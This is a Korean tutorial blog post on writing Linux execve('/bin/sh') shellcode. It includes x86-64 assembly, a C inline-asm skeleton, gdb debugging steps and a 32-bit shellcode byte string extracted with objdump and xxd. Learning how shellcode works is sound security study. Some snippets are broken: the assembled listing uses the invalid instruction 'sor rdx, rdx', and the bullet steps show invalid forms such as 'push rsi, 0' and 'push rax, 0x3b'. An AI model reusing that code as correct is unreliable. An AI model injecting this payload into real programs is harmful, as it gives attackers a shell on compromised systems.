쉘코드 작성해보기 (2)

1.execve 쉘코드

쉘은 운영체제를 감싸고 있는 껍질이다.

즉, 사용자가 운영체제에 명령을 내리기 위해 사용되는 사용자의 인터페이스로,  쉘을 획득하면 시스템을 제어할 수 있게 되므로 통상적으로 셸 획득을 시스템 해킹의 성공으로 여기는 것이다.

 

execve 셸코드는 임의의 프로그램을 실행하는 쉘코드인데, 이를 이용해서 execve("/bin/sh") 와 같은 명령어를 실행시켜 서버의 쉘을 획득할 수 있다.

//따라서 다른 언급없이 셸코드라고 하면 이를 의미하는 경우가 많다.

 

최신의 리눅스는 대부분 sh, bash를 기본 셸 프로그램으로 탑재하고 있으며, 이 외에도 zsh, tsh 등의 셸을 유저가 설치해서 사용할 수 있다.  Ubuntu 22.04에도 /bin/sh가 존재하므로, 이를 실행하는 execve 셸코드를 작성해볼 것이다.

 

 

2.execve 쉘코드 작성

(1) execve(“/bin/sh”, null, null)

execve 셸코드는 execve 시스템 콜만으로 구성된다. 

syscall	rax	rdi	rsi	rdx
execve	0x3b	const char *filename	const char *const *argv	const char *const *envp

 

rdi (첫번째 인자)에는 filname 즉, 실행하고자 하는 파일의 이름이 들어간다. 

우리는 /bin/sh이라는 문자열을 넣어서 쉘을 실행하고자 할 것이므로 7바이트의 문자를 역순으로 rdi에 넣어준다.

/bin/sh은 2f 62 69 6e 2f 73 68 이므로 0x68732f6e69622f 를 넣어주는 것이다. 

• mov  rax, 0x68732f6e69622f
• push rax
• mov rdi, rsp

두번째 인자 rsi에는 실행파일에 넘겨줄 인자, 세번째 인자 rdx에는 환경변수가 들어가야 한다. 이떄 값을 전달해줄 필요가 없다면 두 값 모두 null로 설정해두면 된다. 

값을 넣을 경우 두 배열 모두 null로 끝나야 한다는 것을 잊지 말자! 

+) 0을 넣을 때에는 보통  가장 빠르고 효율적인 방법인 xor 연산을 활용함

• push rsi, 0
• push rdx, 0
• xor rsi, rsi
• sor rdx, rdx

 

이 다음으로 execve syscall을 실행시키기 위해서 rax에 execve syscall number인 0x3b를 넣어주면 된다. 

• push rax, 0x3b

종합해보면 아래 어셈블리어 코드가 완성된다. 

;Name: execve.S

mov rax, 0x68732f6e69622f
push rax
mov rdi, rsp
xor rsi, rsi
sor rdx, rdx
mov rax, 0x3b
syscall

 

3.execve 셸코드 컴파일 및 실행

스켈레톤 코드를 이용하여 execve 셸코드를 컴파일한 뒤 실행해볼 것이다. 

(1) 파일 생성 - vim

// File name: execve.c
// Compile Option: gcc -o execve execve.c -masm=intel

__asm__(
    ".global run_sh\n"
    "run_sh:\n"

    "mov rax, 0x68732f6e69622f\n"
    "push rax\n"
    "mov rdi, rsp  # rdi = '/bin/sh'\n"
    "xor rsi, rsi  # rsi = NULL\n"
    "xor rdx, rdx  # rdx = NULL\n"
    "mov rax, 0x3b # rax = sys_execve\n"
    "syscall       # execve('/bin/sh', null, null)\n"

    "xor rdi, rdi   # rdi = 0\n"
    "mov rax, 0x3c	# rax = sys_exit\n"
    "syscall        # exit(0)");

void run_sh();

int main() { run_sh(); }

 

(2) 컴파일 및 실행 

> gcc -o execve execve.c -masm=intel

> ./execve

gcc -o execve execve.c -masm=intel

 

2.execve 쉘코드 디버깅 

다음으로는 우리가 만든 쉘 코드를 디버깅해볼 것이다. 

> gdb execve 명령어를 통해 gdb를 실행시켜준다. 

 

그 다음 쉘이 실행하는 부분인 run_sh()에 bp를 걸어준다

> b *run_sh

> r

 

execve syscall 이 실행되기 직전인 run_sh+27에 bp를 걸어준 뒤 실행한다. 

> b *run_sh+27

> c

 execve(“/bin/sh”, null, null) 함수는 첫번째 인자에 실행할 파일의 이름을 전달한다.

따라서 rdi를 보면 0x68732f6e69622f  즉, /bin/sh 문자열이 저장된 것을 알 수 있다. 

 

이는 x/s 명령어를 통해 rdi값을 출력해보았을 때에도 동일하게 확인할 수 있다. 

 

ni 명령어를 실행하면 /bin/sh이 실행되는 것을 확인할 수 있다. 

 

++) 에러는 gcc 컴파일러로 컴파일 할 때 -g 옵션을 주지 않았기 때문에 발생하는 것 같아서 수정하였고, 심볼 테이블이나 bp와 관련된 에러는 bp를 설정하지 않으면 발생하지 않는다. 에러의 정확한 원인은 잘 모르겠다..

 

3. objdump 를 이용한 shellcode 추출

objdump란 라이브러리, 컴파일된 오브젝트 모듈, 공유 오브젝트 파일, 독립 실행파일 등의 바이너리 파일들의 정보를 보여주는 프로그램이다. bjdump는 ELF 파일을 어셈블리어로 보여주는 디스어셈블러로도 사용될 수 있다.

 

따라서 작성한 shellcode를 objdump를 이용해서 byte code(opcode)의 형태로 추출할 수 있다. 

먼저 작성한 쉘 코드를 asm 형식으로 저장할 것이다. 

; File name: shellcode.asm
section .text
global _start
_start:
xor    eax, eax
push   eax
push   0x68732f2f
push   0x6e69622f
mov    ebx, esp
xor    ecx, ecx
xor    edx, edx
mov    al, 0xb
int    0x80

 

다음으로 필요한 파일들을 설치해준 뒤, 아래 명령어를 입력하면 오브젝트 파일인 shellcode.o를 얻을 수 있다.

 

다음으로 objcopy 명령어를 이용하면 shellcode.bin 파일을 얻을 수 있다.

그 다음,

xxd 명령어로 shellcode.bin 파일의 내용의 바이트 값들을 16진수 형태로 확인할 수 있다.

 

이렇게 추출한 16진수의 바이트값들을 통해 바이트 형태의 쉘 코드를 만들 수 있다. 

# execve /bin/sh shellcode: 
\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x31\xd2\xb0\x0b\xcd\x80